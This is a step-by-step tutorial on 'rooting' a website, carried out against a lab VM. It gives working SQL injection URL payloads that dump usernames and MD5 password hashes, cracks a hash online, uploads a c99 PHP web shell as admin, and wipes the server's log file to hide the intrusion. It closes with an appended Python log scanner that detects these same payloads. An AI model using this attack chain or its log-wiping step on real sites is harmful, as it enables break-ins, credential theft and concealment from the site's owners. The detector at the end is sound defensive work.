
Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP shell you are comfortable with (Google for "c99 shell")

Now the process

Step 1:

I'm on the home page of the website now

Code:
http://192.168.132.128/

Step 2:

I went through all the pages of the web site and found a page with a parameter in the URL

Code:
http://192.168.132.128/?id=13

Step 3:

I launched Hackbar by pressing F9


Step 4:

The power of the single quote. I'm checking whether the web site is vulnerable by putting a ' at the end of the URL
and pressing Execute.

Code:
http://192.168.132.128/?id=13'

Since the page content is different from the previous one, I can be sure that the web page is vulnerable.

Step 5:

Let's find out the number of tables

Code:
http://192.168.132.128/?id=13 order by 1

Step 6:

I have to keep increasing the last number until I see a change in the page. Done by hand this is a tedious task,
since there will be hundreds or thousands of tables if not more. But with this tool I can simply press the + button
until I see a change on the web page

Code:
http://192.168.132.128/?id=13 order by 7

Step 7:

I went up to 7 and there is no change so far

Code:
http://192.168.132.128/?id=13 order by 7

Step 8:

I'm on 8 now and I can see that the page has changed

Code:
http://192.168.132.128/?id=13 order by 8

Step 9:

Now let's go ahead and build a UNION statement. I just went to SQL > UNION SELECT STATEMENT

Step 10:

I provided the number of tables. Since I got a different page at 8, I can be sure that table 8 does not
exist and there are only 7 tables

Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

Step 12:

I replaced the number 2 in the URL with another SQL expression; it got executed and the result is displayed on the page

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
The current user is cms_user@localhost

Step 13:

Let's find out the version of the database. I replaced 2 in the URL with the version() function

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
5.0.45 is the version

Step 14:

Let me list all the tables

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table

Step 15:

Now I listed all the columns, and it's a big list

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

Step 16:

I want the columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

Step 17:

Let's find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Step 18:

Now, what about the password?

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

It's encrypted

Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

Step 20:

Voilà! I got the password


Step 21:

Finding the login page. It was right in front of me


Step 22:

Logging in with the credentials I have


Step 23:

Greetings!

Step 24:

I'm an admin now. Look at my powers.


Step 25:

Let me add an event


Step 26:

And of course I want to upload a picture


Step 27:

Let's see whether it allows me to upload the shell


Step 28:

Now I'm pressing the "Add Event" button


Step 29:

Nice. Looks like it got uploaded


Step 30:

Let's see where the shell got uploaded to


Step 31:

I'm trying to get the default upload location


Step 32:

Looks like I got it

Let me click on the c9shell.php file I just uploaded

Step 33:

Voilà. I have shell access


Step 34:

I simply clicked on the up button to get the root folder


Now I can do whatever I wish: deface the website, maintain access, or whatever. But that is out of the scope of
the current tutorial

Step 35:

What I'm interested in is the log folder


Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

Step 37:

Let me go back and edit the log file


Step 38:

I deleted all the log entries. Now I'm saving it.

Step 39:

Nice. The log file is empty now


Step 40:

Now, let's remove the c99 shell by pressing Self Remove

Step 41:

Confirmed!

Step 42:

OK. Goodbye, C99

Step 43:

Well, it deleted itself
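The defender's side of the same walkthrough, as an added example that is not part of the tutorial or of the CTF: a small Python scanner that reads web server access log lines in Common Log Format and flags the quote test, the ORDER BY walk (which counts the query's result columns), and the UNION SELECT / information_schema / user() / version() requests from steps 4 to 18, then lists clients that trip it repeatedly. The log lines are constructed here, and the client address 192.168.132.1 is an assumption; only the server address comes from the tutorial.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures for the probing sequence in the tutorial: the quote test, the
# ORDER BY walk, UNION SELECT, and information_schema / user() / version() lookups.
SIGNATURES = [
    ("quote_probe", re.compile(r"\d'\s*$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("db_fingerprint", re.compile(r"\b(user|version|database)\s*\(\s*\)", re.I)),
]
# Common Log Format; only the client IP and request path are needed here.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+"')
# Constructed sample (assumed client 192.168.132.1) walking the tutorial's steps;
# Hackbar sends the space as %20 and the quote as %27. Last line is benign.
SAMPLE_LOG = """\
192.168.132.1 - - [10/Oct/2011:13:55:36 +0000] "GET /?id=13 HTTP/1.1" 200 5120
192.168.132.1 - - [10/Oct/2011:13:55:41 +0000] "GET /?id=13%27 HTTP/1.1" 200 4410
192.168.132.1 - - [10/Oct/2011:13:56:02 +0000] "GET /?id=13%20order%20by%207 HTTP/1.1" 200 5120
192.168.132.1 - - [10/Oct/2011:13:56:05 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 4410
192.168.132.1 - - [10/Oct/2011:13:57:10 +0000] "GET /?id=13%20UNION%20SELECT%201,user(),3,4,5,6,7 HTTP/1.1" 200 5200
192.168.132.1 - - [10/Oct/2011:13:58:30 +0000] "GET /?id=13%20UNION%20SELECT%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20table_name=%27user%27 HTTP/1.1" 200 6100
10.0.0.7 - - [10/Oct/2011:14:01:00 +0000] "GET /?id=14 HTTP/1.1" 200 5010
""".splitlines()

def classify_request(path):
    """Return the signature names matched by any URL-decoded query value in the path."""
    hits = []
    for _, value in parse_qsl(urlsplit(path).query):  # parse_qsl decodes %20, %27, ...
        for name, pattern in SIGNATURES:
            if pattern.search(value) and name not in hits:
                hits.append(name)
    return hits

def scan_access_log(lines):
    """Return (ip, decoded path, hits) for every request that trips a signature."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            hits = classify_request(m["path"])
            if hits:
                flagged.append((m["ip"], unquote_plus(m["path"]), hits))
    return flagged

def suspicious_sources(flagged, threshold=3):
    """Client IPs with at least `threshold` flagged requests; the ORDER BY walk alone reaches it."""
    counts = {}
    for ip, _, _ in flagged:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

Run it against a copy of the access log that is shipped off the web host, since step 38 shows what happens to a log the attacker can reach from a web shell.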
